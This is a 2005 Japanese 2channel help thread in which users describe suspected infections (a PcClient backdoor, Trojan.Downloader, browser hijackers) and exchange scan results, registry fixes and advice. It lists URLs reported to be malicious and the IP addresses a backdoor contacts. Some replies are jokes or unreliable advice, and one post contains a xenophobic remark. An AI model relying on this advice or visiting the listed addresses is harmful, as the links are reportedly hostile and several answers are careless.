190名無しさん@お腹いっぱい。:2005/11/03(木) 11:22:24
そしてまた感染すると
191名無しさん@お腹いっぱい。:2005/11/03(木) 11:48:13
ソニー、シマンテックと共謀しウィルス散布、F-Secure社員が感染し発覚
http://news19.2ch.net/test/read.cgi/news/1130905571/
192名無しさん@お腹いっぱい。:2005/11/03(木) 12:15:49 BE:400452285-
>>188
Pc-Cleanをインストールして駆除できないか試したあと
「ブラウザ設定変更防止機能」を使ってブラウザのスタート
ページを固定してみてくれ
193名無しさん@お腹いっぱい。:2005/11/03(木) 12:52:03
【使用OS】 2000pro sp4
【WindowsUpdateしてるか】yes
安置ウィルスソフトは入れてない、週二位でトレンドマイクロのオンラインスキャンしている→昨夜問題なし
症状:
jpgのURLを踏んだ後強制再起動、再起動後はモニタが映らない
放置すると再起動を繰り返す、モニタは映らないままなので駆動音がするだけ
セーフモードにもならず、OS起動ディスク(FD)を入れると読んでくれるがモニタが(以下略
謎にごくたまに普通に起動することがあるが、暫く作業していると強制シャットダウン後一行目に戻る
原因:↓を踏んだ、場所は2ch
※注意 p//image.blog.livedoor.jp/uzu75/68f51aab.jpg
貼ってあったスレに危険を促す書き込みをしたが、問題ないとレス一件あり

モニタが映らないのでどうしたものやらです、サブからの書き込みです
194名無しさん@お腹いっぱい。:2005/11/03(木) 13:01:59
>>188
何も問題なし
195名無しさん@お腹いっぱい。:2005/11/03(木) 13:03:10
>>193
何も問題なし
196名無しさん@お腹いっぱい。:2005/11/03(木) 13:07:40
違うんだ。
俺はモザイクをどうにかしようと…。
ただそれだけなんだ…。
197名無しさん@お腹いっぱい。:2005/11/03(木) 17:16:11
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < MOZA
 | | |  \_____
 (__)___)
198名無しさん@お腹いっぱい。:2005/11/04(金) 01:55:57
Q.ウイルスバスターオンラインスキャンでは
 ウイルス無しと出るのですがMcAfeeフリースキャンでは
 C:\System Volume Information\...\A0000016.exe
 BackDoor-CUJ ←という名前のウイルスが見つかりました。
 ウイルスバスターってあんまりイケてないんですか?
199名無しさん@お腹いっぱい。:2005/11/04(金) 02:08:53
>>198
大手三社なら
ノートン>マカフィー>>バスターの剣出力だろ
200名無しさん@お腹いっぱい。:2005/11/04(金) 02:38:41
バスター≧ノートン≧マカフィーだろw
201名無しさん@お腹いっぱい。:2005/11/04(金) 03:34:49
>>198
System Volume Information でググれ。
初期設定では、このフォルダをチェック対象から外しているソフトもあるですよ。
202名無しさん@お腹いっぱい。:2005/11/04(金) 06:46:09
Kasperskyが一番だろ。
203名無しさん@お腹いっぱい。:2005/11/04(金) 09:26:31
ノートンが一番しょぼいと思うんだが。
204名無しさん@お腹いっぱい。:2005/11/04(金) 09:50:08
最近Outlook Expressで、以前から登録していた禁止された送信者の一覧が消えてしまいました。
その後も再起動するたびに消えてしまいます。またメールの振り分け条件で送信者で削除条件を設定していた
ルールまで消えてしまいました。何かに感染しているのでしょうか?
XPsp2、ソースネクストウィルスセキュリティーが入っていてUPDATEはいつもしています。
よろしくお願いします。
205名無しさん@お腹いっぱい。:2005/11/04(金) 09:55:30
>>204
HKEY_CURRENT_USER\Identities\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\Software\Microsoft\Outlook Express\5.0\Rules\Mail
削除してから再設定してみな
それでもダメなようならそのソフトを疑った方がいい
206名無しさん@お腹いっぱい。:2005/11/04(金) 10:23:43
>>205
ありがとうございます、早速やってみます。
207名無しさん@お腹いっぱい。:2005/11/04(金) 10:56:56
ソースネクスト製品はあまりいい話は聞かないな…
208名無しさん@お腹いっぱい。:2005/11/04(金) 14:22:58
最近、「a・b・n」を押すと、nbA}}}}} 、AAAAA、 }}}}}}}、 んbA」」」」」などど、
訳のわからない文字が続いて出てきます。
シマンティツクとノートンでオンラインチェックをしても、ウィルスは検出されない
のですが、これは何なのでしょうか?
 
209名無しさん@お腹いっぱい。:2005/11/04(金) 15:28:18
>>208

  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < ソフトウエアセンシングだから、壊れちゃったんじゃないの?
 | | |  \_____
 (__)___)
210208です:2005/11/04(金) 16:13:19
チェックはシマンティックとトレンドマイクロでした。
間違えてすみません。
211名無しさん@お腹いっぱい。:2005/11/04(金) 16:14:57
>>209
えーっ!
本当に壊れているのでしょうか?
何でそうなったのだろう・・・。
212名無しさん@お腹いっぱい。:2005/11/04(金) 17:04:06
寿命。
213名無しさん@お腹いっぱい。:2005/11/04(金) 20:21:50
知らん間に勝手にHDの容量が減っていって今のところ50MBぐらい減ってしまいました
これはウイルスの影響の可能性は低いですか?
214名無しさん@お腹いっぱい。:2005/11/04(金) 20:42:22
>>213
まず「システムの復元」でぐぐってみそ。
215名無しさん@お腹いっぱい。:2005/11/04(金) 23:45:55
Virtual PC 2004 買いました
でもこれってXP はProfessionalじゃ無いと駄目なんですか?
Home Edition じゃ動かないんでしょうか?

悲しい
216名無しさん@お腹いっぱい。:2005/11/05(土) 00:49:00
>>215
スレ違いはひとまず置くとして、買う前に動作要件ぐらい確認しろよ
217215:2005/11/05(土) 01:23:25
確かに、
スレ違いな上にアホだった。
Yahoo!にでも出します。


実は解説書まで買ってしまった。
それを見てHome Edition 駄目って知った。
218名無しさん@お腹いっぱい。:2005/11/05(土) 01:50:13
【使用OS】 WINDOWS2000
【WindowsUpdateしてるか】 多分してないです
【AntiVirusは何を使っているか】 ノートン2004
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 ノートンでは発見されませんでした
【別のオンラインスキャンしたならその結果は】 Panda でスキャンしたら DiskInfo.A というハックツールが見つかりました。駆除できません。
【症状を具体的に、分かる限りすべて書く】 上のハックツールと一緒に Iroffer.AC というウイルスが発見されましたが、こちらは駆除できました。
また、そのウイルスのせいでCPUに負荷がかかっていたようです。DiskInfo.A については良く分かりません。
【何をしたらそんなことになったのか】 落としてきたフリーのゲームか外国サイトのプレイヤーを落とした時に感染したかと思います。
【これまでにとった措置】 DiskInfo.A でググりましたが日本語サイトは検索されず、英語サイトは翻訳をかけても分かりませんでした。
【その他の質問】 panda で Iroffer.AC が駆除できましたが、その前にトレンドマイクロでスキャンしたらBKDR_IROFFER.Uというウイルス名で発見されました。
Iroffer.ACと同じものでしょうか?

よろしくお願いします。
219名無しさん@お腹いっぱい。:2005/11/05(土) 01:51:23
ちょっと前ならHome→Proのアップグレードパックで頑張るって手があったんだがな
220名無しさん@お腹いっぱい。:2005/11/05(土) 02:40:14
本文のない、以下のようなヘッダのついたメールが届いたんですが・・・一体何なんでしょうか?
どなたか教えて下さい。お願いします。

※一部、○と●で伏字にしてあります。

>Return-Path: <zuj○[email protected]>
>Received: from 2○1.○1.○6.1○7 ([6○.1○5.○35.○6○])
> by b○○t.○○○○.○d.jp (8.12.10/8.12.10)
> with SMTP id jA47XbLT014705;
> Fri, ● Nov 2005 16:37:14 +0900 (JST)
>Date: Fri, ● Nov 2005 16:37:14 +0900 (JST)
>From: zuj○[email protected]
>Received: from 2○.1○4.1○3.○85
> by 6○.1○5.○35.○6○;
> Fri, 0● Nov 2005 01:30:18 -0600
>Message-ID: <Y[20
>X-UIDL: P%M!!~gK!!l71"!Ih$#!
221名無しさん@お腹いっぱい。:2005/11/05(土) 02:45:31
お願いします。

【使用OS】 XP SP2
【WindowsUpdateしてるか】 YES
【AntiVirusは何を使っているか】 NOD32
【ちゃんとUpdateしてるか】 YES

「スタートアップ」に、いつの間にかインストールした覚えのない
「Security Update.exe」というのが入っていました。
プロパティ見ても不明、実行すると「ddd」と意味不明なメッセージが
出るだけで、見るからに怪しいのですが、NOD32ではウィルス検出は
されません。これってウィルスなんでしょうか?
222名無しさん@お腹いっぱい。:2005/11/05(土) 02:51:03
こりゃー大変だ
223名無しさん@お腹いっぱい。:2005/11/05(土) 03:08:14
>>221
必要なことが全く書かれてないなぁw

必要なこと

1)スタートアップへ登録されているショートカットの名前は何か?
「Security Update.exe」?
「Security」?

2)ショートカットのプロパティを見て、実際のexe名は何か?

3)そのexeの大きさは?

4)そのexeは何処に登録されているか?フルパス

NOD32が検知しなかったと騒ぐ前に、最低でもこれぐらいは書こうよ。
それとウィルスであると決まった訳でもない。
224名無しさん@お腹いっぱい。:2005/11/05(土) 03:24:56
>>221
実行するなよwww
225名無しさん@お腹いっぱい。:2005/11/05(土) 05:54:19
検出力がNAVに優るアンチウイルスソフトたのむ
226名無しさん@お腹いっぱい。:2005/11/05(土) 06:35:16
225
マルチするな死ね
227名無しさん@お腹いっぱい。:2005/11/05(土) 07:05:57
Nullporceに感染しちゃいました。デスクトップのアイコンが詰まってる
「遺失物保管庫セキュリティ強化型.zip」にパスがかかってるのですがどうしてもわかりません。
誰か教えてください(><)
228221:2005/11/05(土) 10:35:07
>>223
すみません。こんな感じです。

1) スタートアップに登録されているもの
2) 実際のexe名
All Userのスタートアップフォルダに「Security Setup.exe」という
名前の実行ファイルそれ自体がおいてあります。
ショ−トカットではないです。

3) exeのサイズ
1.70 MB (1,788,928 バイト) です。

4) フルパス
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\Security Update.exe
です。

ウィルスと決めつけているわけではないのですが、
ググってもこのプロセスに関する情報が見あたらないので・・・。

>>224
正確には実行されてしまった、でした。
229221:2005/11/05(土) 10:38:26
>>228
すみません、上の 1)、2) で肝心のプロセス名を間違えました。
4) に書いた方が正しく、「Security Update.exe」です。
230名無しさん@お腹いっぱい。:2005/11/05(土) 21:32:59
【使用OS】win2000SP4
【WindowsUpdateしてるか】ここ一ヶ月ほどサボっていたような・・・
【AntiVirusは何を使っているか】バスター2004
【ちゃんとUpdateしてるか】そのつもりであります
【スキャンした結果(ウイルス名・発見場所)】検出されず
【別のオンラインスキャンしたならその結果は】ノートン スパイボット共に無し
【症状を具体的に、分かる限りすべて書く】
OS起動中に画面いっぱいのニコチャンマークが出現→電源が落ちる
【何をしたらそんなことになったのか】
ネットを見ていて、どこぞのリンクをクリックした所、IEが固まる→再起動→現在
【これまでにとった措置】セーフモードでウィルス&トロイ探し
            セーフモードなら起動するのであります
この症例についてご存知の方
知恵を分けて下さいませ
231名無しさん@お腹いっぱい。:2005/11/05(土) 21:39:12
>>230
マルチはスルーされる運命なのだよ
232名無しさん@お腹いっぱい。:2005/11/05(土) 21:48:20
>>231
失礼しました
先に聞いたトピでは趣旨に反する質問だったと自分勝手に判断し
より適しているトピに投稿してみたのですが、確かにマナー違反でした
お気分を害してしまった事をお詫び致します
233名無しさん@お腹いっぱい。:2005/11/05(土) 22:06:47
>>230
URLが分かれば、原因がわかる。
ぐぐったら緑色のニコマークが、云々って書いてあった。
何故いまだにバスター2004を使うのか…
アンチドートでスキャンしてみるとか。
OSの再インストールかな。
234名無しさん@お腹いっぱい。:2005/11/05(土) 22:14:25
先ほど
ttp://acua.tv/fan/
をサイト巡り中に発見し、適当に画像をクリックしたらDOS窓のようなものが大量に出ました・・・
不安に思いDOS窓が4つほど出たところで強制終了をかけたのですが・・・
調べてもまったく判らないのでどなたか教えてもらえないでしょうか・・・
ウィルスとかだったりするんでしょうか・・・?
235名無しさん@お腹いっぱい。:2005/11/05(土) 22:21:41
>>233
ありがとうございます
正直途方に暮れていたので助かります
URLなのですが、正直良く分からないのであります
適当にブログめぐりをしていたので、覚えていないのです
バスター2004については「バンドルされてたので何となく」であります

アンチドート でありますか!
早速試してみます!
236& ◆/p9zsLJK2M :2005/11/05(土) 22:57:07
>>233
バスターのアップグレードもしたほうがいいんじゃない?
今年で2004はサポート切れるし。
237名無しさん@お腹いっぱい。:2005/11/05(土) 23:15:23
235はバスターの製品アップデートが基本的に無料なのを知らない希ガス
238名無しさん@お腹いっぱい。:2005/11/05(土) 23:30:19
>>234
telnet
239名無しさん@お腹いっぱい。:2005/11/05(土) 23:38:59
>>238

調べてみたのですがIPが抜かれてしまったということでしょうか?
240名無しさん@お腹いっぱい。:2005/11/05(土) 23:46:20
パソコン内の情報全て
241名無しさん@お腹いっぱい。:2005/11/06(日) 15:42:51
  /\___/\
/ /    ヽ ::: \
| (●), 、(●)、 |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄
|  ,,ノ(、_, )ヽ、,,   |  < >>240 ヴァカじゃん。
|   ,;‐=‐ヽ   .:::::|    \_______
\  `ニニ´  .:::/
/`ー‐--‐‐―´´\
242名無しさん@お腹いっぱい。:2005/11/06(日) 16:18:48
あげ
243_:2005/11/06(日) 16:27:24
どういう時に、
ウィルスとかスパイウェアってはいってくるんですか?
244名無しさん@お腹いっぱい。:2005/11/06(日) 16:39:34
>>243
心に隙間があるときです。
245名無しさん@お腹いっぱい。:2005/11/06(日) 17:03:39
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>244 だね。
 | | |  \_____
 (__)___)

http://www.itmedia.co.jp/enterprise/articles/0511/02/news015.html
246名無しさん@お腹いっぱい。:2005/11/06(日) 18:16:40
うちの両親の使うウイルスバスター2004で「TSPY_LINEAGE.PJ」
というウイルス発見。と、同時にネットにも繋がらなくなった。
それでwinのsystem32に「hgdll.dll」というファイルが作成された
みたい・・・。
トレンドマイクロのDBにTSPY_LINEAGEの「.PJ」の情報はないん
だけど、googleで「hgdll.dll」を検索すると韓国でウイルス関係の
HP(文字が韓国語)が幾つもHit。多分このファイルの頭のHGっ
てハングルって意味?
多分、母親が最近韓国ドラマにはまって、よく関連HPを探してるみ
たいだからそれで感染したと思われ・・・。
両親、ネットサーフィン以外、まったくPCオンチの為、プロセスの
チェックとファイルの削除を電話による指示で試みたが、挫折・・・。
まぁー、(極端に)嫌韓の俺にとっては、内心「これで母親も目を覚
ましてくれれば」とも思ってるんだけど・・・。

ところで、この「TSPY_LINEAGE.PJ」によってネット(CATV)に繋が
らなくなることってあるんでしょうか?IPCONFIG見ると、いっけん
ネットワークの設定は問題ないように見えるけど。。。これは
ウイルスとは全く関係ない問題なのでしょうか?
247名無しさん@お腹いっぱい。:2005/11/06(日) 18:32:06
質問用テンプレには該当しないのでこのままでよろしくお願いします。
Download板ではすれ違いだと言われこちらに来ました。


拡張子が書庫ファイルや動画ファイルや音楽ファイルや画像ファイルでも
ウイルスを埋め込むことはできますか?
以前、埋め込まれたウイルスのコードを実行するmp3や同様にjpgもあるって聞いたんですが
これはWindows標準のビューアやプレイヤを使わなかったり
Windowsのアップデートで回避できたりしますか?

あとexeやbatやcomなどの拡張子をzipとかmpgとかaviとかjpgに変えても実行されませんよね?
それとも親切なあーカーバやビューアなどが勝手に本当の拡張子を解釈して実行しやがりますか?


あと、>>1の点プレサイトが下のほうがなくなっていたのですが、移転先とかはどこでしょうか?
248名無しさん@お腹いっぱい。:2005/11/06(日) 19:05:08
>>246

  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < う〜ん、どうも最新のTrojanみたいだね。
 | | |  \_____
 (__)___)

漏れならCDブートで消すけどね。漏れの場合は、Bart PE作成してある。
249名無しさん@お腹いっぱい。:2005/11/06(日) 19:23:43
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>247 手法としては、拡張子偽装やバインディングなどじゃない?
 | | |  \_____
 (__)___)

あとは、セキュリティーホール利用とかかなァ。よく知らない。
アンチウイルスやアンチスパイウエアの補完として、ProcessGuardみたいなやつを
入れとくといいんじゃない。漏れは、そのFull Versionの方を使ってます。

250名無しさん@お腹いっぱい。:2005/11/06(日) 20:41:37
最近2chブラウザで閲覧してて土日の12:00になると、Bloodhound.Expilot.6ってウイルスに感染します。
シマンテックのウイルス辞典には6は載ってなかったんだけど、新種なのかな?
251名無しさん@お腹いっぱい。:2005/11/06(日) 20:53:02
>>250

  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < ヒューリスティックスキャンに引っかかるんじゃないの?
 | | |  \_____
 (__)___)
 
確認は必要だと思うけど、たぶん違うと思う。「12:00になると」なんだから、
サーバー上のプログラムか何かが関係してるのでは。
既知のことなのかどうかはしらない。
252名無しさん@お腹いっぱい。:2005/11/06(日) 21:13:59
質問させていただきます。
最近 NECのパソコンを買ったんですが、マカフィーウィルススキャンと、パーソナルファイアプラスがプレインストールされていました。
これって更新にいくら位かかりますか?
253名無しさん@お腹いっぱい。:2005/11/06(日) 21:32:17
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < Googleってみた? 出てなかった?
 | | |  \_____
 (__)___)
254名無しさん@お腹いっぱい。:2005/11/06(日) 23:47:01
  ∧_∧
 ( ´ A`) <君、最近ナイ〜スじゃん 
 (    )  
 | | |  
 (__)___)
255名無しさん@お腹いっぱい。:2005/11/06(日) 23:59:14
スパイウエアかと思い駆除したくてやったのですが
2つのソフトを実行したあとで勝手に開いてしまいます。
ウィルスが原因ではないのでしょうか?

【使用OS】 windowsXPHomeEditon
【WindowsUpdateしてるか】 してます。
【AntiVirusは何を使っているか】 ノートン2003
【ちゃんとUpdateしてるか】 してます。
【スキャンした結果(ウイルス名・発見場所)】 みつからないです。
【症状を具体的に、分かる限りすべて書く】
ttp://www.shop-savings.com/normal/yyy102.html
ttp://www.searc-h.com/normal/yyy65.html等
勝手にページが開いてしまいます。
【何をしたらそんなことになったのか】 不明。
【これまでにとった措置】
SpybotとAd-awareSEやってみました。
256255:2005/11/07(月) 00:01:02
すみません…
2つのソフトを使ったあとでも開いちゃうんです。でした…
257名無しさん@お腹いっぱい。:2005/11/07(月) 00:01:05
>>255
帰れ リカバリー
258名無しさん@お腹いっぱい。:2005/11/07(月) 00:31:59
あげ
259名無しさん@お腹いっぱい。:2005/11/07(月) 00:36:57
>>251
改めて検索したら別名でのってました。対処法も載ってたんですけど未然に防ぐことって出来ないんですかね?
260名無しさん@お腹いっぱい。:2005/11/07(月) 01:45:15
【使用OS】 xp
【WindowsUpdateしてるか】不明
【AntiVirusは何を使っているか】avg使用
【ちゃんとUpdateしてるか】 不明
【スキャンした結果(ウイルス名・発見場所)】
May be infect by unknown virus exploit
こんなのが出てきた。ファイルはjpeg
【別のオンラインスキャンしたならその結果は】やってない
【症状を具体的に、分かる限りすべて書く】 このファイルを削除したいのだが見つからない
【何をしたらそんなことになったのか】 不明
【これまでにとった措置】 三回スキャンして三回とも同じのが出てきた。
【その他の質問】

お願いします
261名無しさん@お腹いっぱい。:2005/11/07(月) 02:05:17
>>260

  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < えっ、? 何でアップデート関連不明なの?
 | | |  \_____
 (__)___)

PCのPはPersonalなんでしょ。自分で管理するものなんでしょ?
とりあえず、他社のオンラインスキャンを利用したら。
JPEGが引っかかってるのは、Malwareの生成物だからなんじゃないの。
よくわからん。
262260:2005/11/07(月) 02:17:28
>>261
すみません
PCが知り合いのPCなのでかなり管理お粗末なんで・・・
他社の使ってみます
あとわかったことはJPEGファイルの場所で
Temporary Internet Filesの中にありました

インターネットオプションでクッキー、履歴、オフラインコンテンツ等を
削除すればおkですか
263名無しさん@お腹いっぱい。:2005/11/07(月) 02:33:08
>>260
そんなパソコン 殺しとけ
264260:2005/11/07(月) 02:36:36
>>263
お怒りごもっとです。
知り合いにきつく言っときます
265名無しさん@お腹いっぱい。:2005/11/07(月) 02:54:34
その知り合いは鏡の向こうに居た
266260:2005/11/07(月) 03:05:11
メッセなんすよ・・・
267名無しさん@お腹いっぱい。:2005/11/07(月) 09:40:39
>>255
つ[Hijack This]
268名無しさん@お腹いっぱい。:2005/11/07(月) 11:16:50
>>227ですが、まだ解決しません。
知ってる方居ましたらどうかレスお願いしますw
269名無しさん@お腹いっぱい。:2005/11/07(月) 13:18:13
>>268
丸ごと捨ててみたら?
270名無しさん@お腹いっぱい。:2005/11/07(月) 13:33:02
>>268
どうしてもパスが調べがつかないようなら、ダメもとで
pikazipとか、全数検索でzipのパスを調べてくれるもので
パスワード解析してみてはいかがでしょう?
271名無しさん@お腹いっぱい。:2005/11/07(月) 13:40:11
>>269
デスクトップにあったファイルが詰まってるので捨てるわけにはいきません 汗

>>270
pikazipも使ったんですがパス見つかりませんでした。一体どうすれば・・・。
272名無しさん@お腹いっぱい。:2005/11/07(月) 13:50:23
>>271

  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < Directory Traversal Bulnerability
 | | |  \_____
 (__)___)

http://cowscorpion.com/file/ZIPPasswordFinder.html

http://www.altech-ads.com/product/10000996.htm

so,Good Luck!!
273名無しさん@お腹いっぱい。:2005/11/07(月) 14:50:33
>>272
ありがd
早速試してみます
274名無しさん@お腹いっぱい。:2005/11/07(月) 16:12:59
age
275名無しさん@お腹いっぱい。:2005/11/07(月) 16:18:09
ぬるぽに感染した場合どうすればイイですか?
XPでウイルスバスターつかってるんですが
276名無しさん@お腹いっぱい。:2005/11/07(月) 16:21:07
>>275
まずこのスレのログをよく読むんだ。
そうすればテンプレを読まない奴がどう対応されるか理解できる。
277名無しさん@お腹いっぱい。:2005/11/07(月) 17:32:18
【使用OS】 XP SP2 home
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 AVG Free ・BitDefender Free
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】
AVGでは検出されず、BitDefenderで検出
ウィルス名 Trojan.Downloader.Small.BKE
発見場所  C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\ODSNSFCB\124042[1].exe
        C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\XPZ0J2UV\121652[1].exe
【症状を具体的に、分かる限りすべて書く】 なし
【何をしたらそんなことになったのか】
該当ファイルのプロパティを見たところThemexp.org・「作者名」
という記述があったことからすると、2日前に
ttp://www.themexp.org/listings.php?type=vs&view=date
で、ある作者のVisual Styleを閲覧orダウンロード?(DLフォルダに該当ファイルがない
のでDLしたかはっきりしない。)したときに感染したと思います。
【これまでにとった措置】
BitDefenderでは削除できなかったので、該当ファイルを直接削除。
その後、BitDefenderで再スキャンしたところ検出されませんでした。
【その他の質問】
Trojan.Downloader.Small.BKEで検索しても完璧にマッチする情報を
得ることできませんでした。(能力不足かも。何語かよくわからないページはhitした。)
そこで、Trojan.Downloaderで検索すると、この種のウィルスは多くのウィルスと
同じ様にsystemフォルダやスタートアップに自らをコピーするようですが、
それらが検出されなかったのでこのままリカバリーせずに使い続けても大丈夫でしょうか?
わかりずらいかも知れませんが、自分の能力で分かる限り補足しますので、
どうぞアドバイスをよろしくお願いします。
278名無しさん@お腹いっぱい。:2005/11/07(月) 18:56:05
>>277
オンラインスキャン
279名無しさん@お腹いっぱい。:2005/11/07(月) 19:05:31
>>277
ウィルスバスター製品版で駆除
280277:2005/11/07(月) 21:47:49
>>278-279
レスありがとうございます。
オンラインスキャンをしました。

【シマンテック】
2chのdatファイルが感染と表示されましたが、
これを無視すると何も感染していませんでした。
もちろんTrojan.Downloader.Small.BKEも見つかりませんでした。

【トレンドマイクロ】
何も感染していませんでした。

一応、FWのログを2時間分ほど見ましたが
怪しい通信もないようです。
こんな感じだったんですが、駆除が成功した。もしくは、
誤検出だったと考えていいんでしょうか・・・?
281188:2005/11/07(月) 21:54:19
>192
その方法で直りました。ありがとうございました。
282名無しさん@お腹いっぱい。:2005/11/07(月) 23:01:07
>>280
問題ない
283名無しさん@お腹いっぱい。:2005/11/08(火) 00:25:18
>>277
そのサイトのThemeすべてにTrojan.Downloader.Small.BKE反応有り。
出所はそこで確定。
ウイルス発動の引き金はThemeインストール中の左下隅のチェックボックス。
これのチェックを全部外せばレジストリの書き換え等は発生しない(と思う)。
ウイルスと言うよりアドウェア、スパイウェアの類かと。
284277:2005/11/08(火) 07:24:18
>>282
ありがとうございます。・・・○| ̄|_

>>283
やはりそうでしたか。
少し気になりますが、現状では何も問題がないのでこのまま使っていこうと思います。
わざわざ検証して頂いてありがとうございました。
お陰で安心する事ができました。・・・○| ̄|_
285名無しさん@お腹いっぱい。:2005/11/08(火) 07:42:37
.exe 踏んでもうたorz
OSリカバリすっかのー。
286名無しさん@お腹いっぱい。:2005/11/08(火) 07:49:51
最近OSリカバリがそれほど苦痛でない自分がいる。
バックアップだけはマメにしよう。
287名無しさん@お腹いっぱい。:2005/11/08(火) 08:01:40
リカバリなんて1-2年毎でいいじゃないか
288名無しさん@お腹いっぱい。:2005/11/08(火) 10:05:44
何かに感染しているのか、感染していないのかを自分で確実に判断出来るようになるまでは、
システムに不安があるような場合にはリカバリーした方がいいに決まってる。
これで、あらゆる不安から解消される。
289名無しさん@お腹いっぱい。:2005/11/08(火) 14:40:48
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < System Partition Image Backup
 | | |  \_____
 (__)___)
290名無しさん@お腹いっぱい。:2005/11/08(火) 16:44:24
208ですが、もう一度質問させて下さい。
よろしくお願いします。

【使用OS】WindowsXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ソースネクスト VS
【ちゃんとUpdateしてるか】してます
【スキャンした結果(ウイルス名・発見場所)】シマンティックで調べた所、ウィルスなしでした。
【別のオンラインスキャンしたならその結果は】 トレンドマイクロでも、なしでした。
【症状を具体的に、分かる限りすべて書く】 「a・b・n」を押すと、nbA}}}}} 、
                     AAAAA、 }}}}}}}、 んbA」」」」」などど、
                     訳のわからない文字が続いて出てきます。
【何をしたらそんなことになったのか】 なぜそうなったのか、全くわかりません。
                   自分専用のパソで、怪しいサイトには行った事はありません。
【これまでにとった措置】 スキャンデスク、キャッシュとクッキーの削除、ディスククリーンアップ

291名無しさん@お腹いっぱい。:2005/11/08(火) 16:45:56
>>290
キーボードドライバを削除して再起動
292名無しさん@お腹いっぱい。:2005/11/08(火) 18:53:24
Antivirus Version Update Result 
AntiVir 6.32.0.6 11.07.2005 no virus found 
Avast 4.6.695.0 11.07.2005 no virus found 
AVG 718 11.03.2005 no virus found 
Avira 6.32.0.6 11.07.2005 no virus found 
BitDefender 7.2 11.07.2005 no virus found 
CAT-QuickHeal 8.00 11.07.2005 (Suspicious) - DNAScan 
ClamAV devel-20050917 11.07.2005 no virus found 
DrWeb 4.33 11.07.2005 BackDoor.PcClient 
eTrust-Iris 7.1.194.0 11.08.2005 no virus found 
eTrust-Vet 11.9.1.0 11.07.2005 no virus found 
Fortinet 2.48.0.0 11.08.2005 no virus found 
F-Prot 3.16c 11.07.2005 no virus found 
Ikarus 0.2.59.0 11.07.2005 no virus found 
Kaspersky 4.0.2.24 11.08.2005 no virus found 
McAfee 4622 11.07.2005 no virus found 
NOD32v2 1.1278 11.07.2005 a variant of Win32/PcClient 
Norman 5.70.10 11.07.2005 no virus found 
Panda 8.02.00 11.07.2005 no virus found 
Sophos 3.99.0 11.08.2005 no virus found 
Symantec 8.0 11.07.2005 no virus found 
TheHacker 5.9.1.030 11.07.2005 no virus found 
VBA32 3.10.4 11.06.2005 Backdoor.Win32.PcClient.en
VB2005 2.933.00 7.510-1002 檢知せず

ログを見ると
218.18.50.97:8011
219.134.35.128:8011
宛てに(10秒おき)送信を試みる。

293名無しさん@お腹いっぱい。:2005/11/08(火) 19:31:19
>>292
ログじゃなくて送信しているプロセスを調べてくんろ
294名無しさん@お腹いっぱい。:2005/11/08(火) 20:13:49
>>293
すまんこ。

送信元は
C:\Program Files\Internet Explorer\IEXPLORE.EXE
となっているがタスクマネージャやProcess Explorer(www.sysinternals.com)には
表示されず。
で、レジストリエディタと睨めっこしていたら
「Ycxtlupv」いう怪しいサービス名を発見。
他にもRPCのエントリにServiceDll="%SystemRoot%\system32\Ycxtlupv.dll"
なんてものがあったのでYcxtlupvで検索して該当するエントリを削除or初期化し再起動。
なんとか止まった?
VB2005 のCPR 2.934.04 で検索しても反応なしですた。
295名無しさん@お腹いっぱい。:2005/11/08(火) 23:11:21
どなたか>>218お願いします(;´д`)
296名無しさん@お腹いっぱい。:2005/11/08(火) 23:16:33
***** 個のファイルをスキャンしたところ、 6 個の感染ファイルが検出されました。
D:\BBS Logs\Logs\2ch\案内\PC初心者\1126885968.dat は Bloodhound.Exploit.6 に感染しています。
D:\BBS Logs\Logs\2ch\外部板\Jane総合掲示板\1119683428.dat は Unix.Penguin に感染しています。
D:\BBS Logs\Logs\2ch\ネット関係\セキュリティ\1003882448.dat は VBS.LoveLetter.A に感染しています。
D:\BBS Logs\Logs\2ch\ネット関係\セキュリティ\1027753135.dat は Unix.Penguin に感染しています。
D:\BBS Logs\Logs\2ch\ネット関係\セキュリティ\1130538758.dat は VBS.LoveLetter.A に感染しています。
D:\BBS Logs\Logs\2ch\カテゴリ雑談\ヒッキー\subject.txt は Unix.Penguin に感染しています

こんなん出ました
297名無しさん@お腹いっぱい。:2005/11/08(火) 23:19:06
>>294
どこで手に入れて、何をして感染したの?
それが分からないとこっちも恐いぜ。
298名無しさん@お腹いっぱい。:2005/11/08(火) 23:19:17
>>296
>こんなん出ました

よかったですね
299268:2005/11/09(水) 11:16:02
>>227>>268ですが、結局解決しませんでした。パスは英語じゃないかも。
自力で探すのは無理なようなので、最後にここで聞いてダメだったら諦めます。
誰か知ってるかたいませんか〜・・・・・?
300名無しさん@お腹いっぱい。:2005/11/09(水) 11:25:17
>>299
ん〜、いい加減、ちっとひつこいかも。
パスは英語じゃないって、だったら、日本語辞書探せばええやん。
pikazipの日本語辞書とか、自分で探したの?
漢字の辞書とか、ぐぐれば出てくるよ。
301名無しさん@お腹いっぱい。:2005/11/09(水) 12:44:38
>>300
ごめんなさい、日本語辞書なんてあったんですね;;
しかし早速やってみましたがダメでした。
まだ何か方法ありますかね・・・・
302名無しさん@お腹いっぱい。:2005/11/09(水) 13:13:24
無い!!
303名無しさん@お腹いっぱい。:2005/11/09(水) 14:46:17
>>291
